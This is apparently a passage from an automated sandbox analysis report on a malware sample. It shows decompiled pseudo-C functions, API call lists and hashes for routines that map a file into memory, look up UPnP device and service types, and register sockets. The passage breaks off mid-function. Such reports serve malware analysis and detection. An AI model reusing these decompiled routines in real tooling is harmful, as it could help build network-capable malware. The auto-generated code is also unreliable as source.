                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6bfaf4f45310fce9545a939de9a762d1e78cec5d6cbb91b294f9239cf924bb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9821F974E40208FBDB10DF94CC49FEEB775AB48705F1085A5FA15AB2C0C7B96A44CB65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E004045F0() {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				InitializeCriticalSection(0x416398);
                                                                                                                                                                                                                                                                                    				_t35 = CreateFileW(0x4165c8, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    				_v8 = _t35;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                                                    						return CloseHandle(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v16 == 0) {
                                                                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                                                                    						CloseHandle(_v12);
                                                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v20 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                                    					_v24 = _v16;
                                                                                                                                                                                                                                                                                    					while(_v20 != 0) {
                                                                                                                                                                                                                                                                                    						if(_v20 >= 0x100) {
                                                                                                                                                                                                                                                                                    							_t45 = E0040B210(_v24, _v24);
                                                                                                                                                                                                                                                                                    							_t67 = _t66 + 4;
                                                                                                                                                                                                                                                                                    							_v28 = _t45;
                                                                                                                                                                                                                                                                                    							if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    								_v20 = _v20 - 0x100;
                                                                                                                                                                                                                                                                                    								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                                                                                                                                                                                                                    									E004044E0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                                                                                                                                                                                                                    									_t66 = _t67 + 0x10;
                                                                                                                                                                                                                                                                                    									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								E00408C70(_v28);
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					UnmapViewOfFile(_v16);
                                                                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t35;
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x004045fb
                                                                                                                                                                                                                                                                                    0x00404615
                                                                                                                                                                                                                                                                                    0x0040461b
                                                                                                                                                                                                                                                                                    0x00404622
                                                                                                                                                                                                                                                                                    0x0040463c
                                                                                                                                                                                                                                                                                    0x00404643
                                                                                                                                                                                                                                                                                    0x0040470b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040470f
                                                                                                                                                                                                                                                                                    0x0040465b
                                                                                                                                                                                                                                                                                    0x00404662
                                                                                                                                                                                                                                                                                    0x00404701
                                                                                                                                                                                                                                                                                    0x00404705
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404705
                                                                                                                                                                                                                                                                                    0x00404674
                                                                                                                                                                                                                                                                                    0x0040467a
                                                                                                                                                                                                                                                                                    0x0040467d
                                                                                                                                                                                                                                                                                    0x0040468a
                                                                                                                                                                                                                                                                                    0x00404692
                                                                                                                                                                                                                                                                                    0x00404697
                                                                                                                                                                                                                                                                                    0x0040469a
                                                                                                                                                                                                                                                                                    0x004046a1
                                                                                                                                                                                                                                                                                    0x004046ae
                                                                                                                                                                                                                                                                                    0x004046ba
                                                                                                                                                                                                                                                                                    0x004046e1
                                                                                                                                                                                                                                                                                    0x004046e6
                                                                                                                                                                                                                                                                                    0x004046f2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046f2
                                                                                                                                                                                                                                                                                    0x004046c0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046a3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040468c
                                                                                                                                                                                                                                                                                    0x004046fb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004046fb
                                                                                                                                                                                                                                                                                    0x00404718

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416398,?,?,?,?,?,00406523), ref: 004045FB
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(004165C8,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00404615
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404636
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404655
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040466E
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 004046FB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00404705
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040470F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3956458805-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ed756388b1b0d6878a7a18186645e736ddd6a16e139f12393ac249dc04bab315
                                                                                                                                                                                                                                                                                    • Instruction ID: fde0418914d6c461a92172338520ab8504d9313cab43c149491a54f3197792e7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed756388b1b0d6878a7a18186645e736ddd6a16e139f12393ac249dc04bab315
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 063145B4D40209FFDB14DBE4CC49FAEB774AB89704F208969E601772C0D7B96541CB59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                                                                                    			E0040C8E0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				WCHAR* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				WCHAR* _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v20);
                                                                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                                                                    						_push(_a4);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v24);
                                                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                                                                                                                                                                                                                    									_t65 = E0040C200(_v20, L"deviceType");
                                                                                                                                                                                                                                                                                    									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                                    									_v28 = _t65;
                                                                                                                                                                                                                                                                                    									if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    										_v32 = 0;
                                                                                                                                                                                                                                                                                    										_push( &_v32);
                                                                                                                                                                                                                                                                                    										_push(_v28);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                                    												_v12 = _v20;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v24);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L22:
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040c8e6
                                                                                                                                                                                                                                                                                    0x0040c8ed
                                                                                                                                                                                                                                                                                    0x0040c8f7
                                                                                                                                                                                                                                                                                    0x0040c900
                                                                                                                                                                                                                                                                                    0x0040c908
                                                                                                                                                                                                                                                                                    0x0040c918
                                                                                                                                                                                                                                                                                    0x0040c92a
                                                                                                                                                                                                                                                                                    0x0040c936
                                                                                                                                                                                                                                                                                    0x0040c940
                                                                                                                                                                                                                                                                                    0x0040c944
                                                                                                                                                                                                                                                                                    0x0040c94d
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040ca33
                                                                                                                                                                                                                                                                                    0x0040c927
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c965
                                                                                                                                                                                                                                                                                    0x0040c96f
                                                                                                                                                                                                                                                                                    0x0040c978
                                                                                                                                                                                                                                                                                    0x0040c983
                                                                                                                                                                                                                                                                                    0x0040c9a4
                                                                                                                                                                                                                                                                                    0x0040c9af
                                                                                                                                                                                                                                                                                    0x0040c9b4
                                                                                                                                                                                                                                                                                    0x0040c9b7
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040c9c0
                                                                                                                                                                                                                                                                                    0x0040c9ca
                                                                                                                                                                                                                                                                                    0x0040c9d3
                                                                                                                                                                                                                                                                                    0x0040c9db
                                                                                                                                                                                                                                                                                    0x0040c9f3
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9f8
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040c9ff
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040ca11
                                                                                                                                                                                                                                                                                    0x0040c9be
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca17
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x0040ca31
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ca23
                                                                                                                                                                                                                                                                                    0x0040ca21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c955
                                                                                                                                                                                                                                                                                    0x0040c92a
                                                                                                                                                                                                                                                                                    0x0040ca38
                                                                                                                                                                                                                                                                                    0x0040ca3e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C99C
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C9FF
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CA17
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                                    • Opcode ID: 165bc14b1495aa1e34f09e783435704cf9eca48613dfae01915159d308c3408b
                                                                                                                                                                                                                                                                                    • Instruction ID: 91ab58cec92addcf45ea7f885c8d98816f20cb839f54337aae792cd6c89d1592
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 165bc14b1495aa1e34f09e783435704cf9eca48613dfae01915159d308c3408b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941E975A0020ADFCB04DF98D894BAFB7B5BF48304F108269E515A7390D778AA85CF95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                                                                                    			E0040C700(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				WCHAR* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				WCHAR* _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v20);
                                                                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                                                                    						_push(_a4);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v24);
                                                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                                                                                                                                                                                                                    									_t65 = E0040C200(_v20, L"serviceType");
                                                                                                                                                                                                                                                                                    									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                                    									_v28 = _t65;
                                                                                                                                                                                                                                                                                    									if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    										_v32 = 0;
                                                                                                                                                                                                                                                                                    										_push( &_v32);
                                                                                                                                                                                                                                                                                    										_push(_v28);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                                    												_v12 = _v20;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v24);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L22:
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040c706
                                                                                                                                                                                                                                                                                    0x0040c70d
                                                                                                                                                                                                                                                                                    0x0040c717
                                                                                                                                                                                                                                                                                    0x0040c720
                                                                                                                                                                                                                                                                                    0x0040c728
                                                                                                                                                                                                                                                                                    0x0040c738
                                                                                                                                                                                                                                                                                    0x0040c74a
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                                                                    0x0040c76d
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c853
                                                                                                                                                                                                                                                                                    0x0040c747
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                                                                                                    0x0040c798
                                                                                                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                                                                                                    0x0040c7c4
                                                                                                                                                                                                                                                                                    0x0040c7cf
                                                                                                                                                                                                                                                                                    0x0040c7d4
                                                                                                                                                                                                                                                                                    0x0040c7d7
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                                                                    0x0040c7f3
                                                                                                                                                                                                                                                                                    0x0040c7fb
                                                                                                                                                                                                                                                                                    0x0040c813
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c843
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c74a
                                                                                                                                                                                                                                                                                    0x0040c858
                                                                                                                                                                                                                                                                                    0x0040c85e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C7BC
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C80B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C81F
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C837
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                                    • Opcode ID: 4741d0aecfd52b34991c53ee9f419a60a0185f3e41b6d02d04152173c09516f5
                                                                                                                                                                                                                                                                                    • Instruction ID: 7b8bcaea6bed01b8a99884d554dfbf2528ef8f0724b329980c1be25b89f5103a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4741d0aecfd52b34991c53ee9f419a60a0185f3e41b6d02d04152173c09516f5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3641FF75A0020ADFCB04EF98C884BAFB7B5BF48305F108269E515A7390D7789E85CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                    			E0040DF90(intOrPtr __eax, void* _a4) {
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                                                                    				long _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t48;
                                                                                                                                                                                                                                                                                    				long _t49;
                                                                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                                                                                                                                                    				_t45 = __eax;
                                                                                                                                                                                                                                                                                    				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_t48 = __eax + 0x20;
                                                                                                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t48);
                                                                                                                                                                                                                                                                                    					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                                                                    						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                                                                                                                                                                                                                    							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                                                                                                                                                                                                                    							if(_t20 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t48);
                                                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                    						_t49 = E00408B00(0x284);
                                                                                                                                                                                                                                                                                    						_t55 = _t54 + 4;
                                                                                                                                                                                                                                                                                    						if(_t49 == 0) {
                                                                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                                                                    							E00409600(_t53);
                                                                                                                                                                                                                                                                                    							return _t49;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t7 = _t49 + 0x264; // 0x264
                                                                                                                                                                                                                                                                                    							 *_t49 = 0x69636c69;
                                                                                                                                                                                                                                                                                    							 *(_t49 + 0x260) = _t53;
                                                                                                                                                                                                                                                                                    							_a4 = 0x10;
                                                                                                                                                                                                                                                                                    							__imp__#5(_t53, _t7,  &_a4);
                                                                                                                                                                                                                                                                                    							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                                                                                                                                                                                                                    								E00408C70(_t49);
                                                                                                                                                                                                                                                                                    								_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                                    								_t49 = 0;
                                                                                                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t28 = E0040BE60();
                                                                                                                                                                                                                                                                                    								_t13 = _t49 + 4; // 0x4
                                                                                                                                                                                                                                                                                    								InterlockedExchange(_t13, _t28);
                                                                                                                                                                                                                                                                                    								_t14 = _t49 + 0x244; // 0x244
                                                                                                                                                                                                                                                                                    								_t15 = _t49 + 8; // 0x8
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
